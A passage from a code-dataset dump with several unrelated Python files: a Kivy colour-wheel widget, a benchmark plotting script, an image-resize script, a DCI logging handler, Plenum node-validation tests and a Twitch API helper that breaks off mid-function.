We\n # don't want to treat the remaining fingers as touches\n return\n else:\n r, theta = rect_to_polar(self._origin, *touch.pos)\n # if touch up is outside the wheel, ignore\n if r >= self._radius:\n return\n # compute which ColorArc is being touched (they aren't\n # widgets so we don't get collide_point) and set\n # _hsv based on the selected ColorArc\n piece = int((theta / (2 * pi)) * self._pieces_of_pie)\n division = int((r / self._radius) * self._piece_divisions)\n self._hsv = \\\n self.arcs[self._pieces_of_pie * division + piece].color\n\n def on__hsv(self, instance, value):\n c_hsv = Color(*value, mode='hsv')\n self.r = c_hsv.r\n self.g = c_hsv.g\n self.b = c_hsv.b\n self.a = c_hsv.a\n self.rgba = (self.r, self.g, self.b, self.a)\n\n def _get_touch_r(self, pos):\n return distance(pos, self._origin)\n\n", "sub_path": "colorPickerCustom/ColorWheel.py", "file_name": "ColorWheel.py", "file_ext": "py", "file_size_in_byte": 8052, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "kivy.uix.widget.Widget", "line_number": 14, "usage_type": "name"}, {"api_name": "kivy.properties.BoundedNumericProperty", "line_number": 24, "usage_type": "call"}, {"api_name": "kivy.properties.BoundedNumericProperty", "line_number": 31, "usage_type": "call"}, {"api_name": "kivy.properties.BoundedNumericProperty", "line_number": 38, "usage_type": "call"}, {"api_name": "kivy.properties.BoundedNumericProperty", "line_number": 45, "usage_type": "call"}, {"api_name": "kivy.properties.ReferenceListProperty", "line_number": 52, "usage_type": "call"}, {"api_name": "kivy.properties.ListProperty", "line_number": 59, "usage_type": "call"}, {"api_name": "kivy.properties.NumericProperty", "line_number": 60, "usage_type": "call"}, {"api_name": "kivy.properties.NumericProperty", "line_number": 62, "usage_type": "call"}, {"api_name": "kivy.properties.NumericProperty", "line_number": 63, "usage_type": "call"}, {"api_name": "kivy.properties.ListProperty", "line_number": 71, "usage_type": "call"}, {"api_name": "colorPickerCustom.colorArc._ColorArc", "line_number": 97, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 100, "usage_type": "name"}, {"api_name": "math.pi", "line_number": 101, "usage_type": "name"}, {"api_name": "kivy.clock.Clock.schedule_once", "line_number": 130, "usage_type": "call"}, {"api_name": "kivy.clock.Clock", "line_number": 130, "usage_type": "name"}, {"api_name": "kivy.clock.Clock.schedule_once", "line_number": 142, "usage_type": "call"}, {"api_name": "kivy.clock.Clock", "line_number": 142, "usage_type": "name"}, {"api_name": "kivy.clock.Clock.get_time", "line_number": 161, "usage_type": "call"}, {"api_name": "kivy.clock.Clock", "line_number": 161, "usage_type": "name"}, {"api_name": "kivy.clock.Clock.schedule_once", "line_number": 191, "usage_type": "call"}, {"api_name": "kivy.clock.Clock", "line_number": 191, "usage_type": "name"}, {"api_name": "kivy.clock.Clock.get_time", "line_number": 193, "usage_type": "call"}, {"api_name": "kivy.clock.Clock", "line_number": 193, "usage_type": "name"}, {"api_name": "kivy.clock.Clock.schedule_once", "line_number": 197, "usage_type": "call"}, {"api_name": "kivy.clock.Clock", "line_number": 197, "usage_type": "name"}, {"api_name": "kivy.clock.Clock.get_time", "line_number": 199, "usage_type": "call"}, {"api_name": "kivy.clock.Clock", "line_number": 199, "usage_type": "name"}, {"api_name": "kivy.uix.colorpicker.rect_to_polar", "line_number": 209, "usage_type": "call"}, {"api_name": 
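The on_touch_up handler above maps a polar touch position to a (piece, division) wheel segment. The same indexing can be checked in isolation with the sketch below; since only the call site of rect_to_polar appears in the record, its polar conversion is reimplemented inline here and should be treated as an assumption about its behavior.

from math import atan2, hypot, pi

def touch_to_segment(pos, origin, radius, pieces_of_pie=16, piece_divisions=10):
    # polar coordinates of the touch relative to the wheel origin,
    # with theta normalised to [0, 2*pi)
    dx, dy = pos[0] - origin[0], pos[1] - origin[1]
    r = hypot(dx, dy)
    theta = atan2(dy, dx) % (2 * pi)
    if r >= radius:
        return None  # outside the wheel, ignored as in on_touch_up
    piece = int((theta / (2 * pi)) * pieces_of_pie)
    division = int((r / radius) * piece_divisions)
    return piece, division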
"math.pi", "line_number": 216, "usage_type": "name"}, {"api_name": "kivy.graphics.Color", "line_number": 222, "usage_type": "call"}, {"api_name": "colorPickerCustom.colorPickerApp.distance", "line_number": 230, "usage_type": "call"}]} +{"seq_id": "167329262", "text": "#!/usr/bin/env python3\n\nimport glob\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport sys\nfrom common import sizeof_fmt, common_style, mk_groups, KBYTES, SMALL_SIZE, MEDIUM_SIZE, LARGE_SIZE\n\nlabels = {\n 'app-sqlite-linux-native.dat': 'Linux\\n(native)',\n 'app-sqlite-newlib-native.dat': 'newlib\\n(native)',\n 'app-sqlite-musl-native.dat': 'musl\\n(native)',\n 'app-sqlite-musl-compat.dat': 'musl\\n(external)',\n }\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 3:\n print(\"Usage: {}
\".format(sys.argv[0]), file=sys.stderr)\n sys.exit(1)\n\n os.chdir(sys.argv[1])\n\n stats = {}\n max_time = 0\n for fn in glob.glob(\"*.dat\"):\n data = np.loadtxt(fn)\n avg = np.average(data)\n std = np.std(data)\n stats[fn] = {\n 'min': avg - std,\n 'avg': avg,\n 'max': avg + std,\n }\n if stats[fn]['max'] > max_time:\n max_time = stats[fn]['max']\n\n # General style\n common_style(plt)\n\n max_time *= 1.2 # Margin above biggest bar\n\n fig = plt.figure(figsize=(8, 4))\n ax = fig.add_subplot(1, 1, 1)\n ax.set_ylabel(\"Time (seconds)\", fontsize=LARGE_SIZE)\n ax.grid(which='major', axis='y', linestyle=':', alpha=0.5, zorder=0)\n yticks = np.arange(0, max_time, step=1)\n ax.set_yticks(yticks, minor=False)\n ax.set_yticklabels([\"%3.0f\" % ytick for ytick in yticks])\n ax.set_ylim(0, max_time)\n\n xlabels = []\n i = 0\n for experiment in labels.keys():\n xlabels.append(labels[experiment])\n time = stats[experiment]\n\n yerr = time['max'] - time['min']\n print(experiment, time['avg'], '+/-', yerr/2)\n\n # Plot each application\n bar = ax.bar([i + 1], time['avg'],\n label=experiment,\n align='center',\n zorder=4,\n yerr=time['max']-time['min'],\n error_kw=dict(lw=2, capsize=10, capthick=1),\n width=0.4,\n color='#5697C4',\n linewidth=0.5\n )\n ax.text(i + 1, time['avg'] + yerr + .05, \"%3.3f\" % time['avg'],\n ha='center',\n va='bottom',\n zorder=6,\n fontsize=LARGE_SIZE,\n linespacing=0,\n bbox=dict(pad=-.6, facecolor='white', linewidth=0),\n rotation='horizontal'\n )\n i += 1\n\n xticks = range(1, len(xlabels) + 1)\n ax.set_xticks(xticks)\n ax.set_xticklabels(xlabels, fontsize=LARGE_SIZE, fontweight='bold')\n ax.set_xlim(.5, len(xlabels) + .5)\n ax.yaxis.grid(True, zorder=0, linestyle=':')\n ax.tick_params(axis='both', which='both', length=0)\n\n plt.setp(ax.lines, linewidth=.5)\n\n fig.tight_layout()\n fig.savefig(sys.argv[2])\n", "sub_path": "experiments/fig_17_unikraft-sqlite-libc/plot.py", "file_name": "plot.py", "file_ext": "py", "file_size_in_byte": 2849, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "sys.argv", "line_number": 18, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 19, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 19, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 20, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 22, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 22, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 29, "usage_type": "call"}, {"api_name": "common.common_style", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "argument"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "common.LARGE_SIZE", "line_number": 45, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 47, "usage_type": "call"}, {"api_name": "common.LARGE_SIZE", "line_number": 76, "usage_type": "name"}, {"api_name": "common.LARGE_SIZE", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", 
"line_number": 90, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 93, "usage_type": "attribute"}]} +{"seq_id": "461370246", "text": "import os\nfrom PIL import Image\nfrom resizeimage import resizeimage\n\n\n\nimgExts = [\"png\", \"bmp\", \"jpg\"]\nfor path, dirs, files in os.walk(os.getcwd()):\n for fileName in files:\n print(fileName)\n ext = fileName[-3:].lower()\n if ext not in imgExts:\n continue\n im = Image.open(os.path.join(path, fileName))\n im2 = im.resize((int(1200),int(1700)))\n im2.save(os.path.join(path, fileName))\n", "sub_path": "apple.py", "file_name": "apple.py", "file_ext": "py", "file_size_in_byte": 437, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.walk", "line_number": 8, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 8, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 14, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 14, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}]} +{"seq_id": "554332446", "text": "# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2016 Red Hat, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport functools\nimport io\nimport logging\nimport sys\nimport threading\n\nfrom dciclient.v1.api import file as dci_file\n\n\ndef setup_logging(dci_context):\n logger = logging.getLogger('__chainsaw__')\n logger.setLevel(logging.DEBUG)\n formatter = logging.Formatter(\n \"%(asctime)s::%(levelname)s::%(message)s\")\n stream_handler = logging.StreamHandler(stream=sys.stdout)\n stream_handler.setFormatter(formatter)\n\n file_handler = logging.FileHandler('chainsaw.log', mode='w')\n file_handler.setFormatter(formatter)\n\n dci_handler = DciHandler(dci_context)\n dci_handler.setFormatter(formatter)\n\n try:\n import colorlog\n\n colored_formatter = colorlog.ColoredFormatter(\n \"%(log_color)s%(asctime)s::%(levelname)s::%(message)s\",\n datefmt=None,\n reset=True,\n log_colors={\n 'DEBUG': 'cyan',\n 'INFO': 'green',\n 'WARNING': 'yellow',\n 'ERROR': 'red',\n 'CRITICAL': 'red'\n }\n )\n stream_handler.setFormatter(colored_formatter)\n except ImportError:\n pass\n logger.addHandler(stream_handler)\n logger.addHandler(file_handler)\n logger.addHandler(dci_handler)\n\n\nclass DciHandler(logging.Handler):\n def __init__(self, dci_context):\n logging.Handler.__init__(self)\n self._dci_context = dci_context\n self._idx_file = 0\n self._current_log = io.StringIO()\n self._threshold_log = 512 * 1024 # 512K\n self._interval = 60 # 1 minute\n timer_handle = functools.partial(self.handle, record=None)\n self._timer = threading.Timer(self._interval, timer_handle)\n try:\n self._timer.start()\n except KeyboardInterrupt:\n self._timer.cancel()\n raise\n\n def _send_log_file(self):\n if not self._dci_context.last_jobstate_id:\n return\n jobstate_id = self._dci_context.last_jobstate_id\n dci_file.create(self._dci_context, 'chainsaw.log-%s' % self._idx_file,\n self._current_log.getvalue(), 'text/plain',\n jobstate_id)\n self._current_log.truncate(0)\n self._current_log.seek(0)\n self._idx_file += 1\n\n def emit(self, record):\n # run by the timer\n if record is None:\n if len(self._current_log.getvalue()) > 0:\n self._send_log_file()\n return\n msg = u\"%s\\n\" % self.format(record)\n self._current_log.write(msg)\n # if it's an error then send the log\n if record.levelno == logging.ERROR:\n self._send_log_file()\n # if we reach the current log threshold\n elif len(self._current_log.getvalue()) > self._threshold_log:\n self._send_log_file()\n", "sub_path": "rdomhelper/logger.py", "file_name": "logger.py", "file_ext": "py", "file_size_in_byte": 3414, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "logging.getLogger", "line_number": 27, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 28, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 29, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 31, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 31, "usage_type": "attribute"}, {"api_name": "logging.FileHandler", "line_number": 34, "usage_type": "call"}, {"api_name": "colorlog.ColoredFormatter", "line_number": 43, "usage_type": "call"}, {"api_name": "logging.Handler", "line_number": 63, "usage_type": "attribute"}, {"api_name": "logging.Handler.__init__", "line_number": 65, "usage_type": "call"}, {"api_name": "logging.Handler", "line_number": 65, "usage_type": "attribute"}, {"api_name": "io.StringIO", "line_number": 68, "usage_type": "call"}, 
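The DciHandler above buffers log records in a StringIO and flushes either on ERROR or once a size threshold is crossed. The standard library's MemoryHandler covers the record-count variant of the same batching idea without a custom handler; in this sketch the capacity, the target file name and the logger name mirror the record only loosely and are illustrative.

import logging
import logging.handlers

# buffer up to 512 records, flush them to the file handler as a batch,
# and flush immediately whenever an ERROR (or worse) arrives
target = logging.FileHandler('chainsaw.log')
buffered = logging.handlers.MemoryHandler(
    capacity=512,
    flushLevel=logging.ERROR,
    target=target)
logging.getLogger('__chainsaw__').addHandler(buffered)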
{"api_name": "functools.partial", "line_number": 71, "usage_type": "call"}, {"api_name": "threading.Timer", "line_number": 72, "usage_type": "call"}, {"api_name": "dciclient.v1.api.file.create", "line_number": 83, "usage_type": "call"}, {"api_name": "dciclient.v1.api.file", "line_number": 83, "usage_type": "name"}, {"api_name": "logging.ERROR", "line_number": 99, "usage_type": "attribute"}]} +{"seq_id": "558804045", "text": "import itertools\nfrom copy import copy\n\nimport base58\nfrom plenum.common.constants import *\nfrom plenum.common.signer_simple import SimpleSigner\nfrom plenum.common.util import getMaxFailures, randomString\nfrom plenum.test import waits\nfrom plenum.test.helper import sendReqsToNodesAndVerifySuffReplies, \\\n waitRejectWithReason, \\\n waitReqNackFromPoolWithReason\nfrom plenum.test.node_catchup.helper import waitNodeDataEquality, \\\n ensureClientConnectedToNodesAndPoolLedgerSame\nfrom plenum.test.pool_transactions.helper import addNewClient, addNewStewardAndNode, sendAddNewNode\nfrom plenum.test.test_node import checkNodesConnected, \\\n checkProtocolInstanceSetup\n\nfrom stp_core.common.log import getlogger\nfrom stp_core.loop.eventually import eventually\n\nlogger = getlogger()\n\n# logged errors to ignore\nwhitelist = ['found legacy entry', \"doesn't match\", 'reconciling nodeReg',\n 'missing', 'conflicts', 'matches', 'nodeReg',\n 'conflicting address', 'unable to send message',\n 'got error while verifying message']\n\n\n# Whitelisting \"got error while verifying message\" since a node while not have\n# initialised a connection for a new node by the time the new node's message\n# reaches it\n\n\ndef testNodesConnect(txnPoolNodeSet):\n pass\n\n\ndef testNodesReceiveClientMsgs(looper, txnPoolNodeSet, wallet1, client1,\n client1Connected):\n ensureClientConnectedToNodesAndPoolLedgerSame(looper, client1,\n *txnPoolNodeSet)\n sendReqsToNodesAndVerifySuffReplies(looper, wallet1, client1, 1)\n\n\ndef testAddNewClient(looper, txnPoolNodeSet, steward1, stewardWallet):\n wallet = addNewClient(None, looper, steward1, stewardWallet, randomString())\n\n def chk():\n for node in txnPoolNodeSet:\n assert wallet.defaultId in node.clientAuthNr.clients\n\n timeout = waits.expectedTransactionExecutionTime(len(txnPoolNodeSet))\n looper.run(eventually(chk, retryWait=1, timeout=timeout))\n\n\ndef testStewardCannotAddNodeWithNonBase58VerKey(looper, tdir,\n txnPoolNodeSet,\n newAdHocSteward):\n \"\"\"\n The Case:\n Steward accidentally sends the NODE txn with a non base58 verkey.\n The expected result:\n Steward gets NAck response from the pool.\n \"\"\"\n # create a new steward\n newSteward, newStewardWallet = newAdHocSteward\n\n newNodeName = \"Epsilon\"\n\n # get hex VerKey\n sigseed = randomString(32).encode()\n nodeSigner = SimpleSigner(seed=sigseed)\n b = base58.b58decode(nodeSigner.identifier)\n hexVerKey = bytearray(b).hex()\n\n def _setHexVerkey(op):\n op[TARGET_NYM] = hexVerKey\n return op\n\n sendAddNewNode(newNodeName, newSteward, newStewardWallet,\n transformOpFunc=_setHexVerkey)\n waitReqNackFromPoolWithReason(looper, txnPoolNodeSet, newSteward,\n 'is not a base58 string')\n\n\ndef testStewardCannotAddNodeWithInvalidHa(looper, tdir,\n txnPoolNodeSet,\n newAdHocSteward):\n \"\"\"\n The case:\n Steward accidentally sends the NODE txn with an invalid HA.\n The expected result:\n Steward gets NAck response from the pool.\n \"\"\"\n newNodeName = \"Epsilon\"\n\n newSteward, newStewardWallet = newAdHocSteward\n\n # a sequence of the test cases for each field\n tests = 
itertools.chain(\n itertools.product(\n (NODE_IP, CLIENT_IP), ('127.0.0.1 ', '256.0.0.1', '0.0.0.0')\n ),\n itertools.product(\n (NODE_PORT, CLIENT_PORT), ('foo', '9700', 0, 65535 + 1, 4351683546843518184)\n ),\n )\n\n for field, value in tests:\n # create a transform function for each test\n def _tnf(op): op[DATA].update({field: value})\n\n sendAddNewNode(newNodeName, newSteward, newStewardWallet,\n transformOpFunc=_tnf)\n # wait for NAcks with the exact message; just 'is invalid' does not work\n # because 'is invalid' alone would match only the first few cases\n waitReqNackFromPoolWithReason(looper, txnPoolNodeSet, newSteward,\n \"'{}' ('{}') is invalid\".format(field, value))\n\n\ndef testStewardCannotAddNodeWithOutFullFieldsSet(looper, tdir,\n txnPoolNodeSet,\n newAdHocSteward):\n \"\"\"\n The case:\n Steward accidentally sends the NODE txn without full fields set.\n The expected result:\n Steward gets NAck response from the pool.\n \"\"\"\n newNodeName = \"Epsilon\"\n\n newSteward, newStewardWallet = newAdHocSteward\n\n # case from the ticket\n def _renameNodePortField(op):\n op[DATA].update({NODE_PORT + ' ': op[DATA][NODE_PORT]})\n del op[DATA][NODE_PORT]\n\n sendAddNewNode(newNodeName, newSteward, newStewardWallet,\n transformOpFunc=_renameNodePortField)\n waitReqNackFromPoolWithReason(looper, txnPoolNodeSet, newSteward,\n \"unknown field\")\n\n for fn in (NODE_IP, CLIENT_IP, NODE_PORT, CLIENT_PORT):\n def _tnf(op): del op[DATA][fn]\n\n sendAddNewNode(newNodeName, newSteward, newStewardWallet,\n transformOpFunc=_tnf)\n # wait for NAcks with the exact message; just 'is missed' does not work\n # because 'is missed' alone would match only the first few cases\n waitReqNackFromPoolWithReason(looper, txnPoolNodeSet, newSteward,\n \"unknown field\")\n\n\ndef testStewardCannotAddMoreThanOneNode(looper, txnPoolNodeSet, steward1,\n stewardWallet, tdirWithPoolTxns, tconf,\n allPluginsPath):\n newNodeName = \"Epsilon\"\n sendAddNewNode(newNodeName, steward1, stewardWallet)\n\n for node in txnPoolNodeSet:\n waitRejectWithReason(looper, steward1,\n 'already has a node',\n node.clientstack.name)\n\n\ndef testNonStewardCannotAddNode(looper, txnPoolNodeSet, client1,\n wallet1, client1Connected, tdirWithPoolTxns,\n tconf, allPluginsPath):\n newNodeName = \"Epsilon\"\n sendAddNewNode(newNodeName, client1, wallet1)\n for node in txnPoolNodeSet:\n waitRejectWithReason(looper, client1, 'is not a steward so cannot add a '\n 'new node', node.clientstack.name)\n\n\ndef testClientConnectsToNewNode(looper, txnPoolNodeSet, tdirWithPoolTxns,\n tconf, steward1, stewardWallet, allPluginsPath):\n \"\"\"\n A client should be able to connect to a newly added node\n \"\"\"\n newStewardName = \"testClientSteward\" + randomString(3)\n newNodeName = \"Epsilon\"\n oldNodeReg = copy(steward1.nodeReg)\n newSteward, newStewardWallet, newNode = addNewStewardAndNode(looper,\n steward1, stewardWallet,\n newStewardName, newNodeName,\n tdirWithPoolTxns, tconf,\n allPluginsPath)\n txnPoolNodeSet.append(newNode)\n looper.run(checkNodesConnected(txnPoolNodeSet))\n logger.debug(\"{} connected to the pool\".format(newNode))\n\n def chkNodeRegRecvd():\n assert (len(steward1.nodeReg) - len(oldNodeReg)) == 1\n assert (newNode.name + CLIENT_STACK_SUFFIX) in steward1.nodeReg\n\n timeout = waits.expectedClientToPoolConnectionTimeout(len(txnPoolNodeSet))\n looper.run(eventually(chkNodeRegRecvd, retryWait=1, timeout=timeout))\n ensureClientConnectedToNodesAndPoolLedgerSame(looper, steward1,\n *txnPoolNodeSet)\n 
ensureClientConnectedToNodesAndPoolLedgerSame(looper, newSteward,\n *txnPoolNodeSet)\n\n\ndef testAdd2NewNodes(looper, txnPoolNodeSet, tdirWithPoolTxns, tconf, steward1,\n stewardWallet, allPluginsPath):\n \"\"\"\n Add 2 new nodes to trigger replica addition and primary election\n \"\"\"\n for nodeName in (\"Zeta\", \"Eta\"):\n newStewardName = \"testClientSteward\" + randomString(3)\n newSteward, newStewardWallet, newNode = addNewStewardAndNode(looper,\n steward1,\n stewardWallet,\n newStewardName,\n nodeName,\n tdirWithPoolTxns,\n tconf,\n allPluginsPath)\n txnPoolNodeSet.append(newNode)\n looper.run(checkNodesConnected(txnPoolNodeSet))\n logger.debug(\"{} connected to the pool\".format(newNode))\n waitNodeDataEquality(looper, newNode, *txnPoolNodeSet[:-1])\n\n f = getMaxFailures(len(txnPoolNodeSet))\n\n def checkFValue():\n for node in txnPoolNodeSet:\n assert node.f == f\n assert len(node.replicas) == (f + 1)\n\n timeout = waits.expectedClientToPoolConnectionTimeout(len(txnPoolNodeSet))\n looper.run(eventually(checkFValue, retryWait=1, timeout=timeout))\n checkProtocolInstanceSetup(looper, txnPoolNodeSet, retryWait=1)\n", "sub_path": "plenum/test/pool_transactions/test_nodes_with_pool_txns.py", "file_name": "test_nodes_with_pool_txns.py", "file_ext": "py", "file_size_in_byte": 9741, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "stp_core.common.log.getlogger", "line_number": 21, "usage_type": "call"}, {"api_name": "plenum.test.node_catchup.helper.ensureClientConnectedToNodesAndPoolLedgerSame", "line_number": 41, "usage_type": "call"}, {"api_name": "plenum.test.helper.sendReqsToNodesAndVerifySuffReplies", "line_number": 43, "usage_type": "call"}, {"api_name": "plenum.test.pool_transactions.helper.addNewClient", "line_number": 47, "usage_type": "call"}, {"api_name": "plenum.common.util.randomString", "line_number": 47, "usage_type": "call"}, {"api_name": "plenum.test.waits.expectedTransactionExecutionTime", "line_number": 53, "usage_type": "call"}, {"api_name": "plenum.test.waits", "line_number": 53, "usage_type": "name"}, {"api_name": "stp_core.loop.eventually.eventually", "line_number": 54, "usage_type": "call"}, {"api_name": "plenum.common.util.randomString", "line_number": 72, "usage_type": "call"}, {"api_name": "plenum.common.signer_simple.SimpleSigner", "line_number": 73, "usage_type": "call"}, {"api_name": "base58.b58decode", "line_number": 74, "usage_type": "call"}, {"api_name": "plenum.test.pool_transactions.helper.sendAddNewNode", "line_number": 81, "usage_type": "call"}, {"api_name": "plenum.test.helper.waitReqNackFromPoolWithReason", "line_number": 83, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 101, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 102, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 105, "usage_type": "call"}, {"api_name": "plenum.test.pool_transactions.helper.sendAddNewNode", "line_number": 114, "usage_type": "call"}, {"api_name": "plenum.test.helper.waitReqNackFromPoolWithReason", "line_number": 118, "usage_type": "call"}, {"api_name": "plenum.test.pool_transactions.helper.sendAddNewNode", "line_number": 140, "usage_type": "call"}, {"api_name": "plenum.test.helper.waitReqNackFromPoolWithReason", "line_number": 142, "usage_type": "call"}, {"api_name": "plenum.test.pool_transactions.helper.sendAddNewNode", "line_number": 148, "usage_type": "call"}, {"api_name": 
"plenum.test.helper.waitReqNackFromPoolWithReason", "line_number": 152, "usage_type": "call"}, {"api_name": "plenum.test.pool_transactions.helper.sendAddNewNode", "line_number": 160, "usage_type": "call"}, {"api_name": "plenum.test.helper.waitRejectWithReason", "line_number": 163, "usage_type": "call"}, {"api_name": "plenum.test.pool_transactions.helper.sendAddNewNode", "line_number": 172, "usage_type": "call"}, {"api_name": "plenum.test.helper.waitRejectWithReason", "line_number": 174, "usage_type": "call"}, {"api_name": "plenum.common.util.randomString", "line_number": 183, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 185, "usage_type": "call"}, {"api_name": "plenum.test.pool_transactions.helper.addNewStewardAndNode", "line_number": 186, "usage_type": "call"}, {"api_name": "plenum.test.test_node.checkNodesConnected", "line_number": 192, "usage_type": "call"}, {"api_name": "plenum.test.waits.expectedClientToPoolConnectionTimeout", "line_number": 199, "usage_type": "call"}, {"api_name": "plenum.test.waits", "line_number": 199, "usage_type": "name"}, {"api_name": "stp_core.loop.eventually.eventually", "line_number": 200, "usage_type": "call"}, {"api_name": "plenum.test.node_catchup.helper.ensureClientConnectedToNodesAndPoolLedgerSame", "line_number": 201, "usage_type": "call"}, {"api_name": "plenum.test.node_catchup.helper.ensureClientConnectedToNodesAndPoolLedgerSame", "line_number": 203, "usage_type": "call"}, {"api_name": "plenum.common.util.randomString", "line_number": 213, "usage_type": "call"}, {"api_name": "plenum.test.pool_transactions.helper.addNewStewardAndNode", "line_number": 214, "usage_type": "call"}, {"api_name": "plenum.test.test_node.checkNodesConnected", "line_number": 223, "usage_type": "call"}, {"api_name": "plenum.test.node_catchup.helper.waitNodeDataEquality", "line_number": 225, "usage_type": "call"}, {"api_name": "plenum.common.util.getMaxFailures", "line_number": 227, "usage_type": "call"}, {"api_name": "plenum.test.waits.expectedClientToPoolConnectionTimeout", "line_number": 234, "usage_type": "call"}, {"api_name": "plenum.test.waits", "line_number": 234, "usage_type": "name"}, {"api_name": "stp_core.loop.eventually.eventually", "line_number": 235, "usage_type": "call"}, {"api_name": "plenum.test.test_node.checkProtocolInstanceSetup", "line_number": 236, "usage_type": "call"}]} +{"seq_id": "596996987", "text": "import json\nimport random\nimport asyncio\nimport socket\nimport dateutil.parser\n\nimport common.http\nfrom common import utils\nfrom common.config import config\n\nGAME_CHECK_INTERVAL = 5*60\n\ndef get_info_uncached(username=None, use_fallback=True):\n\t\"\"\"\n\tGet the Twitch info for a particular user or channel.\n\n\tDefaults to the stream channel if not otherwise specified.\n\n\tFor response object structure, see:\n\thttps://github.com/justintv/Twitch-API/blob/master/v3_resources/channels.md#example-response\n\n\tMay throw exceptions on network/Twitch error.\n\t\"\"\"\n\tif username is None:\n\t\tusername = config['channel']\n\n\t# Attempt to get the channel data from /streams/channelname\n\t# If this succeeds, it means the channel is currently live\n\theaders = {\n\t\t'Client-ID': config['twitch_clientid'],\n\t}\n\tres = common.http.request(\"https://api.twitch.tv/kraken/streams/%s\" % username, headers=headers)\n\tdata = json.loads(res)\n\tchannel_data = data.get('stream') and data['stream'].get('channel')\n\tif channel_data:\n\t\tchannel_data['live'] = True\n\t\tchannel_data['viewers'] = 
data['stream'].get('viewers')\n\t\tchannel_data['stream_created_at'] = data['stream'].get('created_at')\n\t\treturn channel_data\n\n\tif not use_fallback:\n\t\treturn None\n\n\t# If that failed, it means the channel is offline\n\t# Get the channel data from here instead\n\tres = common.http.request(\"https://api.twitch.tv/kraken/channels/%s\" % username, headers=headers)\n\tchannel_data = json.loads(res)\n\tchannel_data['live'] = False\n\treturn channel_data\n\n@utils.cache(GAME_CHECK_INTERVAL, params=[0, 1])\ndef get_info(username=None, use_fallback=True):\n\treturn get_info_uncached(username, use_fallback=use_fallback)\n\n@utils.cache(GAME_CHECK_INTERVAL, params=[0, 1])\ndef get_game(name, all=False):\n\t\"\"\"\n\tGet the game information for a particular game.\n\n\tFor response object structure, see:\n\thttps://github.com/justintv/Twitch-API/blob/master/v3_resources/search.md#example-response-1\n\n\tMay throw exceptions on network/Twitch error.\n\t\"\"\"\n\tsearch_opts = {\n\t\t'query': name,\n\t\t'type': 'suggest',\n\t\t'live': 'false',\n\t}\n\theaders = {\n\t\t'Client-ID': config['twitch_clientid'],\n\t}\n\tres = common.http.request(\"https://api.twitch.tv/kraken/search/games\", search_opts, headers=headers)\n\tres = json.loads(res)\n\tif all:\n\t\treturn res['games']\n\telse:\n\t\tfor game in res['games']:\n\t\t\tif game['name'] == name:\n\t\t\t\treturn game\n\t\treturn None\n\ndef get_game_playing(username=None):\n\t\"\"\"\n\tGet the game information for the game the stream is currently playing\n\t\"\"\"\n\tchannel_data = get_info(username, use_fallback=False)\n\tif not channel_data or not channel_data['live']:\n\t\treturn None\n\tif channel_data.get('game'):\n\t\treturn get_game(name=channel_data['game'])\n\treturn None\n\ndef is_stream_live(username=None):\n\t\"\"\"\n\tGet whether the stream is currently live\n\t\"\"\"\n\tchannel_data = get_info(username, use_fallback=False)\n\treturn channel_data and channel_data['live']\n\n@asyncio.coroutine\ndef get_subscribers(channel, token, count=5, offset=None, latest=True):\n\theaders = {\n\t\t\"Authorization\": \"OAuth %s\" % token,\n\t\t\"Client-ID\": config['twitch_clientid'],\n\t}\n\tdata = {\n\t\t\"limit\": str(count),\n\t\t\"direction\": \"desc\" if latest else \"asc\",\n\t}\n\tif offset is not None:\n\t\tdata['offset'] = str(offset)\n\tres = yield from 